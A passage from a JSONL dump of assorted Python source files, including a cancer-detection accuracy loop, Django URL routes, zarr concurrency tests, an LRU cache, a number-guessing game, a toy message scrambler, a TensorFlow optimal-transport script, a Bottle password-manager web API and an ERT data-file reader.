predictions\n        rounded = []\n        for prediction in predictions:\n            if prediction[0] >= regularizer[3]:\n                rounded.append(1)\n            else:\n                rounded.append(0)\n\n        # add cancer types\n        types = total[2][test]\n\n        # add real cancer value\n        real = total[1][test]\n        # change to add cancer type\n        temp_positive = 0\n        accuracy = 0\n        for count, value in enumerate(rounded):\n            if real[count] == 0 and value != 0:\n                temp_positive += 1\n            elif real[count] == value:\n                accuracy += 1\n            line = str(real[count]) + \",\" + \\\n                str(value) + \",\" + str(types[count])\n            file.write(line + \"\\n\")\n        print(\"false positives: \" + str(temp_positive))\n        accuracy /= len(rounded)\n        print(\"real accuracy: \" + str(accuracy) + \"\\n\")\n        average += accuracy\n        false_positive += temp_positive\n\n    file.close()\n    print()\n    # average holds the sum of the 10 fold accuracies, so the mean in percent is average*10\n    print('The accuracy of the model is '+str(average*10)+'%')\n    print('False positives:',false_positive)\n    print('Total number of datasets',len(total_data))\nmain()","sub_path":"Code/AccurateDetect.py","file_name":"AccurateDetect.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"165390531","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.contrib import admin\n\nfrom .settings import MEDIA_ROOT, DEBUG\n\nadmin.autodiscover()\n\nurlpatterns = patterns(\n    '',\n    url(r'^$', 'apps.hello.views.home', name='home'),\n\n    url(r'^requests/$', 'apps.request.views.request_store',\n        name='requests'),\n\n    url(r'^edit/$', 'apps.hello.views.edit', name='user_detail'),\n\n    url(r'^login/$', 'django.contrib.auth.views.login',\n        {'template_name': 'login.html'}, name='login'),\n\n    url(r'^logout/$', 'django.contrib.auth.views.logout',\n        {'next_page': '/'}, name='logout'),\n\n    url(r'^admin/', include(admin.site.urls)),\n)\nurlpatterns += staticfiles_urlpatterns()\n\nif DEBUG:\n    urlpatterns += patterns('',\n                            url(r'^uploads/(?P<path>.*)$',\n                                'django.views.static.serve',\n                                {'document_root': MEDIA_ROOT}))\n","sub_path":"fortytwo_test_task/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"647093196","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, print_function, division\nfrom tempfile import mkdtemp\nimport atexit\nimport json\nimport shutil\nfrom multiprocessing.pool import ThreadPool\nfrom multiprocessing import Pool as ProcessPool\nfrom multiprocessing import cpu_count\nimport tempfile\nimport traceback\nimport sys\n\n\nimport numpy as np\nfrom nose.tools import eq_ as eq, assert_is_instance\nfrom numpy.testing import assert_array_equal\n\n\nfrom zarr.tests.test_attrs import TestAttributes\nfrom zarr.tests.test_core import TestArray\nfrom zarr.tests.test_hierarchy import TestGroup\nfrom zarr.sync import ThreadSynchronizer, ProcessSynchronizer\nfrom zarr.core import Array\nfrom zarr.attrs import Attributes\nfrom zarr.storage import init_array, DirectoryStore, init_group, atexit_rmtree\nfrom zarr.compat import PY2\nfrom zarr.codecs import Zlib\nfrom zarr.hierarchy import Group\n\n\nclass TestAttributesWithThreadSynchronizer(TestAttributes):\n\n    def init_attributes(self, store, read_only=False):\n        key = 'attrs'\n        store[key] = json.dumps(dict()).encode('ascii')\n        synchronizer = ThreadSynchronizer()\n        return Attributes(store, synchronizer=synchronizer, key=key,\n                          read_only=read_only)\n\n\nclass 
TestAttributesProcessSynchronizer(TestAttributes):\n\n def init_attributes(self, store, read_only=False):\n key = 'attrs'\n store[key] = json.dumps(dict()).encode('ascii')\n sync_path = mkdtemp()\n atexit.register(shutil.rmtree, sync_path)\n synchronizer = ProcessSynchronizer(sync_path)\n return Attributes(store, synchronizer=synchronizer, key=key,\n read_only=read_only)\n\n\ndef _append(arg):\n z, i = arg\n import numpy as np\n x = np.empty(1000, dtype='i4')\n x[:] = i\n shape = z.append(x)\n return shape\n\n\ndef _set_arange(arg):\n z, i = arg\n import numpy as np\n x = np.arange(i*1000, (i*1000)+1000, 1)\n z[i*1000:(i*1000)+1000] = x\n return i\n\n\nclass MixinArraySyncTests(object):\n\n def test_parallel_setitem(self):\n n = 100\n\n # setup\n arr = self.create_array(shape=n * 1000, chunks=999, dtype='i4')\n arr[:] = 0\n pool = self.create_pool()\n\n # parallel setitem\n results = pool.map(_set_arange, zip([arr] * n, range(n)), chunksize=1)\n results = sorted(results)\n\n print(results)\n eq(list(range(n)), results)\n assert_array_equal(np.arange(n * 1000), arr[:])\n\n pool.terminate()\n\n def test_parallel_append(self):\n n = 100\n\n # setup\n arr = self.create_array(shape=1000, chunks=999, dtype='i4')\n arr[:] = 0\n pool = self.create_pool()\n\n # parallel append\n results = pool.map(_append, zip([arr] * n, range(n)), chunksize=1)\n results = sorted(results)\n\n print(results)\n eq([((i+2)*1000,) for i in range(n)], results)\n eq(((n+1)*1000,), arr.shape)\n\n pool.terminate()\n\n\nclass TestArrayWithThreadSynchronizer(TestArray, MixinArraySyncTests):\n\n def create_array(self, read_only=False, **kwargs):\n store = dict()\n init_array(store, **kwargs)\n return Array(store, synchronizer=ThreadSynchronizer(),\n read_only=read_only)\n\n def test_repr(self):\n if not PY2:\n\n z = self.create_array(shape=100, chunks=10, dtype='f4',\n compressor=Zlib(1))\n # flake8: noqa\n expect = \"\"\"Array((100,), float32, chunks=(10,), order=C)\n nbytes: 400; nbytes_stored: 245; ratio: 1.6; initialized: 0/10\n compressor: Zlib(level=1)\n store: dict; synchronizer: ThreadSynchronizer\n\"\"\"\n actual = repr(z)\n for l1, l2 in zip(expect.split('\\n'), actual.split('\\n')):\n eq(l1, l2)\n\n def create_pool(self):\n pool = ThreadPool(cpu_count())\n return pool\n\n\nclass TestArrayWithProcessSynchronizer(TestArray, MixinArraySyncTests):\n\n def create_array(self, read_only=False, **kwargs):\n path = tempfile.mkdtemp()\n atexit.register(atexit_rmtree, path)\n store = DirectoryStore(path)\n init_array(store, **kwargs)\n sync_path = tempfile.mkdtemp()\n atexit.register(atexit_rmtree, sync_path)\n synchronizer = ProcessSynchronizer(sync_path)\n return Array(store, synchronizer=synchronizer,\n read_only=read_only, cache_metadata=False)\n\n def test_repr(self):\n if not PY2:\n\n z = self.create_array(shape=100, chunks=10, dtype='f4',\n compressor=Zlib(1))\n # flake8: noqa\n expect = \"\"\"Array((100,), float32, chunks=(10,), order=C)\n nbytes: 400; nbytes_stored: 245; ratio: 1.6; initialized: 0/10\n compressor: Zlib(level=1)\n store: DirectoryStore; synchronizer: ProcessSynchronizer\n\"\"\"\n actual = repr(z)\n for l1, l2 in zip(expect.split('\\n'), actual.split('\\n')):\n eq(l1, l2)\n\n def create_pool(self):\n pool = ProcessPool(processes=cpu_count())\n return pool\n\n\ndef _create_group(arg):\n g, name = arg\n h = g.create_group(name)\n return h.name\n\n\ndef _require_group(arg):\n g, name = arg\n h = g.require_group(name)\n return h.name\n\n\nclass MixinGroupSyncTests(object):\n\n def 
test_parallel_create_group(self):\n\n # setup\n g = self.create_group()\n pool = self.create_pool()\n\n # parallel create group\n n = 100\n results = pool.map(\n _create_group,\n zip([g] * n, [str(i) for i in range(n)]),\n chunksize=1\n )\n results = sorted(results)\n pool.close()\n pool.terminate()\n\n print(results)\n eq(n, len(g))\n\n pool.terminate()\n\n def test_parallel_require_group(self):\n\n # setup\n g = self.create_group()\n pool = self.create_pool()\n\n # parallel require group\n n = 100\n results = pool.map(\n _require_group,\n zip([g] * n, [str(i//10) for i in range(n)]),\n chunksize=1\n )\n results = sorted(results)\n pool.close()\n pool.terminate()\n\n print(results)\n eq(n//10, len(g))\n\n pool.terminate()\n\n\nclass TestGroupWithThreadSynchronizer(TestGroup, MixinGroupSyncTests):\n\n def create_group(self, store=None, path=None, read_only=False,\n chunk_store=None, synchronizer=None):\n if store is None:\n store, chunk_store = self.create_store()\n init_group(store, path=path, chunk_store=chunk_store)\n synchronizer = ThreadSynchronizer()\n g = Group(store, path=path, read_only=read_only,\n chunk_store=chunk_store, synchronizer=synchronizer)\n return g\n\n def create_pool(self):\n pool = ThreadPool(cpu_count())\n return pool\n\n def test_group_repr(self):\n if not PY2:\n g = self.create_group()\n expect = 'Group(/, 0)\\n' \\\n ' store: dict; synchronizer: ThreadSynchronizer'\n actual = repr(g)\n for l1, l2 in zip(expect.split('\\n'), actual.split('\\n')):\n eq(l1, l2)\n\n def test_synchronizer_property(self):\n g = self.create_group()\n assert_is_instance(g.synchronizer, ThreadSynchronizer)\n\n\nclass TestGroupWithProcessSynchronizer(TestGroup, MixinGroupSyncTests):\n\n def create_store(self):\n path = tempfile.mkdtemp()\n atexit.register(atexit_rmtree, path)\n store = DirectoryStore(path)\n return store, None\n\n def create_group(self, store=None, path=None, read_only=False,\n chunk_store=None, synchronizer=None):\n if store is None:\n store, chunk_store = self.create_store()\n init_group(store, path=path, chunk_store=chunk_store)\n sync_path = tempfile.mkdtemp()\n atexit.register(atexit_rmtree, sync_path)\n synchronizer = ProcessSynchronizer(sync_path)\n g = Group(store, path=path, read_only=read_only,\n synchronizer=synchronizer, chunk_store=chunk_store)\n return g\n\n def create_pool(self):\n pool = ProcessPool(processes=cpu_count())\n return pool\n\n def test_group_repr(self):\n if not PY2:\n g = self.create_group()\n expect = 'Group(/, 0)\\n' \\\n ' store: DirectoryStore; synchronizer: ProcessSynchronizer'\n actual = repr(g)\n for l1, l2 in zip(expect.split('\\n'), actual.split('\\n')):\n eq(l1, l2)\n\n def test_synchronizer_property(self):\n g = self.create_group()\n assert_is_instance(g.synchronizer, ProcessSynchronizer)\n","sub_path":"zarr/tests/test_sync.py","file_name":"test_sync.py","file_ext":"py","file_size_in_byte":8702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"184011090","text":"from doubly_linked_list import DoublyLinkedList\n\nclass LRUCache:\n \"\"\"\n Our LRUCache class keeps track of the max number of nodes it\n can hold, the current number of nodes it is holding, a doubly-\n linked list that holds the key-value entries in the correct\n order, as well as a storage dict that provides fast access\n to every node stored in the cache.\n \"\"\"\n def __init__(self, limit=10):\n\n # max number of nodes it can hold\n self.limit = limit\n # current number of nodes it holding\n self.current = 0 
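The zarr tests above exercise many workers writing into one array guarded by a synchronizer. A hedged standalone sketch of that pattern (zarr v2 API, as imported in the record; the slices here are chunk-aligned, so the per-chunk locks are only a safety net):

```python
import zarr
from zarr.sync import ThreadSynchronizer
from multiprocessing.pool import ThreadPool

# One shared array; the synchronizer serializes writes per chunk.
z = zarr.zeros(10000, chunks=1000, dtype='i4', synchronizer=ThreadSynchronizer())

def fill(i):
    z[i * 1000:(i + 1) * 1000] = i  # each worker writes one chunk-aligned slice
    return i

with ThreadPool(4) as pool:
    pool.map(fill, range(10))
assert int(z[2500]) == 2
```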
\n\n # doubly linked list that holds entries in order\n self.order = DoublyLinkedList()\n\n # storage dict\n self.storage = {}\n\n\n \"\"\"\n Retrieves the value associated with the given key. Also\n needs to move the key-value pair to the end of the order\n such that the pair is considered most-recently used.\n Returns the value associated with the key or None if the\n key-value pair doesn't exist in the cache.\n \"\"\"\n def get(self, key):\n\n # check if key is in {}\n if key in self.storage:\n # if yes, move its node to the tail (most recently used)\n # in this case, the node is the value attached to the key\n node = self.storage[key]\n self.order.move_to_end(node)\n # return only the value associated with the key\n return node.value[1]\n else:\n return None\n\n\n \"\"\"\n Adds the given key-value pair to the cache. The newly-\n added pair should be considered the most-recently used\n entry in the cache. If the cache is already at max capacity\n before this entry is added, then the oldest entry in the\n cache needs to be removed to make room. Additionally, in the\n case that the key already exists in the cache, we simply\n want to overwrite the old value associated with the key with\n the newly-specified value.\n \"\"\"\n def set(self, key, value):\n\n # if key exists, overwrite\n if key in self.storage:\n # we need value and node to update\n # update dict, set to new value\n # note: each key is associated with a key-value pair\n node = self.storage[key]\n node.value = (key, value)\n # move to the tail of the DLL (most recently used)\n self.order.move_to_end(node) \n return \n\n # if max capacity, drop oldest entry before adding\n elif self.current == self.limit:\n # delete oldest key value pair in {} first with the key\n del self.storage[self.order.head.value[0]]\n # remove the oldest entry (the head) from the DLL \n self.order.remove_from_head()\n self.current -= 1\n \n # add to the cache - add to the DLL first, then the dict\n # add to nodes\n self.order.add_to_tail((key, value))\n # point the dict at the newly created tail node\n self.storage[key] = self.order.tail\n # update counter\n self.current += 1","sub_path":"lru_cache/lru_cache.py","file_name":"lru_cache.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"78126955","text":"import random\n\nmax_guess = 10\n\ndef getSecretNumber():\n return str(random.randint(100,1000000))\n\ndef getClues(guess,secretNum):\n if int(guess) == int(secretNum):\n return 'you win'\n\n clues = []\n for i in range(len(guess)):\n if guess[i] in secretNum:\n if guess[i] == secretNum[i]:\n clues.append('Fermi')\n else:\n clues.append('Pico')\n else:\n clues.append('Bagels')\n\n return ' '.join(clues)\n\nprint('Welcome Bagels')\n\nsecertNumber = ''\ndef origin():\n global secertNumber\n secertNumber = getSecretNumber()\n print('the number you have to guess is ',len(secertNumber))\n\ndef getPlayerMove():\n\n def isDigit(num):\n global secertNumber\n if num == '':\n return False\n\n if len(num) != len(secertNumber):\n print('wrong length')\n return False\n\n for i in num:\n if i not in '0 1 2 3 4 5 6 7 8 9'.split():\n return False\n\n return True\n\n move = ''\n while not isDigit(move):\n move = str(input())\n return move\n\ndef playAgain():\n print('Do you want to play again y/n')\n if input().lower().startswith('y'):\n return True\n else:\n return False\n\ndef OnGame():\n global secertNumber\n\n origin()\n\n onGame = True\n while onGame:\n for i in range(max_guess):\n print('Guess ###:')\n guess = getPlayerMove()\n content = getClues(guess,secertNumber)\n if content == 
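With the get/set fixes above (tail = most recently used, head = eviction candidate), the cache behaves as sketched below; a usage example assuming the DoublyLinkedList helper from the same package:

```python
cache = LRUCache(limit=2)
cache.set('a', 1)
cache.set('b', 2)
cache.get('a')            # touching 'a' makes it most recently used
cache.set('c', 3)         # at capacity: evicts 'b', the least recently used
assert cache.get('b') is None
assert cache.get('a') == 1 and cache.get('c') == 3
```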
'you win':\n print(content)\n break\n else:\n print(content)\n if playAgain():\n origin()\n else:\n onGame = False\n\nOnGame()","sub_path":"Python For Leisure/EasyGame/Bagels.py","file_name":"Bagels.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"203010205","text":"# -------------------------------------------------------------------------------\n# Name: 005 Simple encrypt/decrypt method\n# Purpose: Take a simple message and hide it in scrambled text\n#\n# Author: Douglas Green\n#\n# Created: 4/1/2017\n# Copyright: (c) Douglas Green 2017\n# Licence: GPL 2.0\n# -------------------------------------------------------------------------------\nimport string\nimport random\n\n\ndef usr_input():\n\t\"\"\"\nGets the appropriate information from the user\n:return: none\n\"\"\"\n\ttry:\n\t\tmsg = input('Type your secret message here:')\n\t\toff = int(input('choose an offset, type a positive number here:'))\n\t\tfill = int(input('How many filling characters would you like to use:'))\n\t\tencrypter(off, fill, msg)\n\texcept TypeError:\n\t\tprint('Unknown characters please try again')\n\t\tusr_input()\n\texcept ValueError:\n\t\tprint('Unknown characters please try again')\n\t\tusr_input()\n\n\ndef ch_decrypt():\n\ttry:\n\t\toffset = int(input('What is the offset for the message?'))\n\t\tfill = int(input('What is the fill setting'))\n\t\tmsg = input('What is the encrypted message?')\n\t\tdecrypter(offset, fill, msg)\n\texcept TypeError:\n\t\tprint('Incorrect input please start over')\n\t\tch_decrypt()\n\texcept ValueError:\n\t\tprint('Incorrect input please start over')\n\t\tch_decrypt()\n\n\ndef choice():\n\tch1 = input('To encrypt type \"1\" to decrypt type \"2\"')\n\tif ch1 == \"1\":\n\t\tusr_input()\n\telif ch1 == \"2\":\n\t\tch_decrypt()\n\telse:\n\t\tprint('Incorrect input try again')\n\t\tchoice()\n\n\ndef encrypter(offset, fill, message):\n\t\"\"\"\nEncrypts the message and prints the encrypted form to the console.\n:param offset: int\n:param fill: int\n:param message: string\n:return: none\n\"\"\"\n\tout_str = \"\"\n\t# Add offset characters\n\tout_str += randomizer(offset)\n\tfor x in message:\n\t\t# for each character insert filler characters in between\n\t\tout_str += x + randomizer(fill)\n\tprint(out_str)\n\n\ndef decrypter(offset, fill, message):\n\t\"\"\"\ndecrypts a super secret message\n:param offset: int\n:param fill: int\n:param message: string\n:return: none\n\"\"\"\n\t# Use the string functions to decrypt the message\n\tprint(message[offset:len(message):(fill + 1)])\n\n\ndef randomizer(number):\n\t\"\"\"\nReturns string of random characters\n:param number: int\n:return: string\n\"\"\"\n\tx = number\n\ty = \"\"\n\t# How many randomised letters do we need\n\twhile x > 0:\n\t\t# From the range of letters digits and spaces select one\n\t\ty += random.choice(string.ascii_letters + string.digits + string.punctuation + \" \")\n\t\tx -= 1\n\treturn y\n\n\nif __name__ == '__main__':\n\t# Start the program\n\tchoice()\n","sub_path":"005/005 Simple en-de crypt.py","file_name":"005 Simple en-de crypt.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"632046438","text":"import os, sys\nsys.path.append(os.getcwd())\n\nimport numpy as np\nimport tensorflow as tf\nfrom ff_nets import ff_net\nimport time\n\n# Specifying problem parameters\nN_RUNS = 10 # number of identical experiment 
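The encrypt/decrypt pair above hides each character behind `offset` leading junk characters plus `fill` junk characters after every real one, so decryption is a plain slice. A worked check with fixed filler standing in for randomizer:

```python
secret, offset, fill = "hi", 3, 2
encrypted = "XYZ" + "h" + "ab" + "i" + "cd"  # offset junk, then char + fill junk
assert encrypted[offset:len(encrypted):fill + 1] == secret
```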
runs\nBATCH_THETA = 2 ** 7\nBATCH_MU = 2 ** 7\n\nN = 20000 # total number of training steps for generator\nN_REPORT = 100\nN_SAMPS_TOTAL = 20000 # number of samples generated\nSAVE_VALUES = 1 # if 0, then no values are saved\nN_inf = 1 # number of infimum steps for each generator step; set to either 1 or 10 for values in the paper\nN_r = 1000\nN_s = 200 # warm up phase for generator without infimum steps. Otherwise, particularly if many infimum steps are\n# used, the generator sometimes gets stuck at very concentrated and bad measures. Algorithmically, this should be\n# regarded as an extended initialization for the weights of the generator.\n\n# network architecture\nLAYERS_H = 4\nHIDDEN_H = 64\nLAYERS_T = 4\nHIDDEN_T = 64\nACT_T = 'tanh'\nACT_H = 'ReLu'\n\n\n# specifying the measures mu, theta and kappa, and the objective function f\ndef sample_mu(batch_size):\n while 1:\n dataset = np.random.normal(0, 2, [batch_size, 2])\n yield dataset\n\n\ndef sample_kappa(batch_size):\n while 1:\n yield np.random.standard_t(8, [batch_size, 1])\n\n\ndef sample_theta(batch_size):\n while 1:\n yield np.random.uniform(-1, 1, [batch_size, 2])\n\n\ndef f_objective(u):\n return tf.nn.relu(tf.reduce_sum(u, axis=1))\n\n\n# build tensorflow graph\nfor run_K in range(N_RUNS):\n t0 = time.time()\n tf.reset_default_graph()\n\n x_mu = tf.placeholder(shape=[None, 2], dtype=tf.float32) # samples from mu\n x_theta = tf.placeholder(shape=[None, 2], dtype=tf.float32) # samples from theta\n x_kappa = tf.placeholder(shape=[None, 1], dtype=tf.float32) # samples from kappa\n\n T_theta = ff_net(x_theta, 'T', input_dim=2, output_dim=2, activation=ACT_T, n_layers=LAYERS_T, hidden_dim=HIDDEN_T)\n\n h_mu = 0 # sum over h evaluated at samples of mu\n h_T_theta = 0 # sum over h evaluated at samples of theta\n for i in range(2):\n h_mu += ff_net(x_mu[:, i:(i + 1)], 'h_' + str(i), input_dim=1, output_dim=1, activation=ACT_H,\n n_layers=LAYERS_H, hidden_dim=HIDDEN_H)\n h_T_theta += ff_net(T_theta[:, i:(i + 1)], 'h_' + str(i), input_dim=1, output_dim=1, activation=ACT_H,\n n_layers=LAYERS_H, hidden_dim=HIDDEN_H)\n\n h_kappa_mu = ff_net(x_kappa, 'h_kappa', input_dim=1, output_dim=1, activation=ACT_H, n_layers=LAYERS_H,\n hidden_dim=HIDDEN_H)\n h_kappa_T_theta = ff_net(T_theta[:, 0:1] - T_theta[:, 1:2], 'h_kappa', input_dim=1, output_dim=1,\n activation=ACT_H, n_layers=LAYERS_H, hidden_dim=HIDDEN_H)\n\n obj = tf.reduce_mean(f_objective(T_theta)) - tf.reduce_mean(h_T_theta) + tf.reduce_mean(h_mu) - tf.reduce_mean(\n h_kappa_T_theta) + tf.reduce_mean(h_kappa_mu)\n\n T_vars = [v for v in tf.compat.v1.global_variables() if ('T' in v.name)]\n h_vars = [v for v in tf.compat.v1.global_variables() if ('h' in v.name)]\n\n train_op_h = tf.compat.v1.train.AdamOptimizer(learning_rate=0.0001, beta1=0.5, beta2=0.9, epsilon=1e-08).minimize(\n obj, var_list=h_vars)\n train_op_T = tf.compat.v1.train.AdamOptimizer(learning_rate=0.0001, beta1=0.5, beta2=0.9, epsilon=1e-08).minimize(\n -obj, var_list=T_vars)\n\n # training and saving values\n objective_values = []\n samp_mu = sample_mu(BATCH_MU)\n samp_theta = sample_theta(BATCH_THETA)\n samp_kappa = sample_kappa(BATCH_MU)\n with tf.compat.v1.Session() as sess:\n sess.run(tf.compat.v1.global_variables_initializer())\n for i in range(1, N + 1):\n for _ in range(N_inf):\n if i > N_s:\n s_mus = next(samp_mu)\n s_theta = next(samp_theta)\n s_kappa = next(samp_kappa)\n (_,) = sess.run([train_op_h], feed_dict={x_mu: s_mus, x_theta: s_theta, x_kappa: s_kappa})\n s_mus = next(samp_mu)\n s_theta = 
next(samp_theta)\n s_kappa = next(samp_kappa)\n (_, ov) = sess.run([train_op_T, obj], feed_dict={x_mu: s_mus, x_theta: s_theta, x_kappa: s_kappa})\n objective_values.append(ov)\n if i % N_REPORT == 0:\n print(i, 'objective value = ' + str(np.mean(objective_values[-N_r:])))\n print('runtime: ' + str(time.time() - t0))\n print('final objective value = ' + str(np.mean(objective_values[-N_r:])))\n print('total runtime for this run: ' + str(time.time() - t0))\n\n if SAVE_VALUES == 1:\n np.savetxt('output/objective_values_base' + str(N_inf) + '_' + str(run_K), objective_values)\n","sub_path":"dcot/base_case.py","file_name":"base_case.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"598446439","text":"# Web API for Lozinke\n# by Stefan Midjich \n# Part of the Lozinke project. See LICENSE file for copyright. \n# See README.md for details.\n\nfrom __future__ import print_function\n\nfrom datetime import datetime\nfrom json import dumps, loads, JSONEncoder\nfrom ConfigParser import ConfigParser\nfrom uuid import uuid4, UUID\n\nimport psycopg2, psycopg2.extras\nfrom bottle import get, post, route, run, request, response, default_app, debug, hook\nfrom keep import KeepAss, Category, Entry, Encrypt\n\nconfig = ConfigParser()\nconfig.readfp(open('keep.cfg'))\nconfig.read(['keep_local.cfg'])\n\n# TODO: This could probably be used to decrypt bytea fields too if they were \n# stored in a special type. \nclass LozEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, UUID):\n return str(obj)\n if isinstance(obj, datetime):\n return obj.isoformat()\n return JSONEncoder.default(self, obj)\n\n# Takes a Category instance as argument.\ndef serialize_category(category):\n return dict(\n category_id = category.id,\n created = category.created,\n parent_id = category.parent_id,\n name = category.name\n )\n\n# Decorator to enable CORS\n@hook('after_request')\ndef enable_cors():\n # TODO: I would wish for this to be dynamic so it matches the method list\n # in the route decorator for each route. 
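base_case.py feeds training from infinite generator functions: each `next()` call yields a fresh batch. The pattern reduced to a standalone sketch:

```python
import numpy as np

def sample_uniform(batch_size, dim=2):
    while True:  # infinite: the training loop pulls batches with next()
        yield np.random.uniform(-1, 1, [batch_size, dim])

gen = sample_uniform(4)
batch = next(gen)
assert batch.shape == (4, 2)
```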
\n methods = ['GET', 'POST', 'UPDATE', 'DELETE', 'OPTIONS']\n response.add_header(\n 'Access-Control-Allow-Origin', \n config.get('api', 'allow-origin')\n )\n response.add_header(\n 'Access-Control-Allow-Methods', \n ','.join(methods)\n )\n response.add_header(\n 'Access-Control-Allow-Headers', \n 'X-Custom-Header'\n )\n\npsycopg2.extras.register_uuid()\ndb = psycopg2.connect(\n host = config.get('db', 'hostname'),\n port = config.get('db', 'port'),\n database = config.get('db', 'database'),\n user = config.get('db', 'username'),\n password = config.get('db', 'password')\n)\n\nk = KeepAss(db)\n\n# Fetch root categories\n@get('/categories')\ndef list_categories():\n _categories = []\n for category in k.categories():\n _categories.append(\n serialize_category(category)\n )\n if not len(_categories):\n response.status = 404\n return dumps(_categories, cls = LozEncoder)\n\n# Fetch category info\n# TODO: Perhaps write a custom filter for UUIDs in URLs\n@get('/category/<category_id>')\n@get('/category/<category_id>/categories')\n@get('/category/<category_id>/entries')\n@post('/category')\n@post('/category/<category_id>/add_category')\n@route('/category/<category_id>', method='UPDATE')\n@route('/category/<category_id>', method='DELETE')\ndef category(category_id=None):\n parent_category_id = None\n\n # First make an uuid if the method is POST.\n if request.method == 'POST' and not category_id:\n new_category_uuid = uuid4()\n category_id = new_category_uuid\n parent_category_id = request.params.get('parent_id', None)\n auto_create = True\n elif request.method == 'POST' and category_id:\n # This is for adding child categories under a parent\n new_category_uuid = uuid4()\n try:\n parent_category = Category(\n db,\n category_id = category_id\n )\n except Exception as e:\n response.status = 404\n return dumps(dict(\n error = 'not found',\n message = str(e)\n ))\n parent_category_id = parent_category.id\n category_id = new_category_uuid\n auto_create = True\n elif request.method == 'UPDATE' and category_id:\n category = Category(\n db,\n category_id = category_id\n )\n try:\n category.parent_id = request.params.get('parent_id', None)\n category.name = request.params.get('name', 'No name')\n except Exception as e:\n response.status = 500\n return dumps(dict(\n error = 'category not updated',\n message = str(e)\n ))\n\n response.status = 200\n return dumps(dict(message = 'category updated'))\n elif request.method == 'DELETE' and category_id:\n try:\n k.remove_category(category_id)\n except Exception as e:\n response.status = 500\n return dumps(dict(\n error = 'could not delete category',\n message = str(e)\n ))\n return dumps(dict(\n message = 'category and all sub-categories were deleted'\n ))\n else:\n auto_create = False\n\n basename = request.path.split('/')[-1]\n\n # Now we can use the UUID to either create a category or fetch an existing\n try:\n c = Category(\n db, \n category_id = category_id,\n parent_id = parent_category_id,\n name = request.params.get('name', 'No name'),\n auto_create = auto_create\n )\n except Exception as e:\n response.status = 404\n return dumps(dict(error = 'not found'))\n\n if basename == 'categories':\n _categories = []\n for category in c.categories():\n _categories.append(\n serialize_category(category)\n )\n if not len(_categories):\n response.status = 404\n return dumps(_categories, cls = LozEncoder)\n elif basename == 'entries':\n _entries = []\n for entry in c.entries():\n # This only returns unencrypted information\n _entries.append(dict(\n entry_id = entry.id,\n title = entry.title,\n created = entry.created\n ))\n if not len(_entries):\n 
response.status = 404\n return dumps(_entries, cls = LozEncoder)\n else:\n return dumps(serialize_category(c), cls = LozEncoder)\n\n# List all entries\n@get('/entries')\ndef list_entries():\n _entries = []\n for entry in k.entries():\n _entries.append(dict(\n entry_id = entry.id,\n title = entry.title,\n created = entry.created,\n category_id = entry.category_id\n ))\n if not len(_entries):\n response.status = 404\n return dumps(_entries, cls = LozEncoder)\n\n# Fetch entry info\n@get('/entry/<entry_id>')\n@post('/entry')\ndef entry(entry_id=None):\n # Init empty variables for encrypted data\n req_notes = ''\n req_username = ''\n req_password = ''\n\n # First handle POST requests\n if request.method == 'POST':\n # Generate new uuid for entry\n new_entry_uuid = uuid4()\n entry_id = new_entry_uuid\n auto_create = True\n\n # Encrypt values for new entry creation\n with Encrypt(\n salt = config.get('keep', 'salt'),\n passphrase = config.get('keep', 'passphrase')\n ) as e:\n req_notes = e.encrypt(request.params.get('notes', ''))\n req_username = e.encrypt(request.params.get('username', ''))\n req_password = e.encrypt(request.params.get('password', ''))\n else:\n auto_create = False\n entry_id = UUID(entry_id)\n\n # This creates the Entry with the previously generated UUID as id, unless \n # it exists in DB already. \n try:\n entry = Entry(\n db, \n entry_id = entry_id,\n # The rest of the arguments are only for POST method\n auto_create = auto_create,\n category_id = None,\n title = request.params.get('title', 'No title'),\n notes = buffer(req_notes),\n username = buffer(req_username),\n url = request.params.get('url', ''),\n password = buffer(req_password)\n )\n except Exception as e:\n if request.method == 'POST':\n response.status = 500\n return dumps(dict(\n error = 'not created',\n message = str(e)\n ))\n else:\n response.status = 404\n return dumps(dict(\n error = 'not found',\n message = str(e)\n ))\n\n # Decrypt values again\n with Encrypt(\n salt = config.get('keep', 'salt'),\n passphrase = config.get('keep', 'passphrase')\n ) as e:\n return dumps(dict(\n entry_id = entry.id,\n created = entry.created,\n category_id = entry.category_id,\n title = entry.title,\n notes = e.decrypt(entry.notes),\n username = e.decrypt(entry.username),\n url = entry.url,\n password = e.decrypt(entry.password)\n ), cls = LozEncoder)\n\nif __name__ == '__main__':\n run(\n host = config.get('api', 'host'),\n port = config.get('api', 'port')\n )\n debug(config.get('api', 'debug'))\nelse:\n application = default_app()\n","sub_path":"webapi.py","file_name":"webapi.py","file_ext":"py","file_size_in_byte":8861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"281999536","text":"__author__ = '531767'\n\nimport re\nimport os\nimport pandas as pd\n\ndef read_mertpd_txt(file):\n (head, filename) = os.path.split(file)\n print('Reading ' + filename)\n data = pd.read_csv(file, sep='\\t', index_col=0, header=0)\n return data\n\nif __name__ == '__main__':\n\n files = []\n files.append('C:/Users\\Arno\\Documents\\ERT_LORETTE\\RCH\\\\1_DIP_48_a3_n10_Pro_20150223_000002.txt')\n data = read_mertpd_txt(files[0])\n print(data['Tx Bat'])","sub_path":"ReadErtData/read_mertpd_txt.py","file_name":"read_mertpd_txt.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} 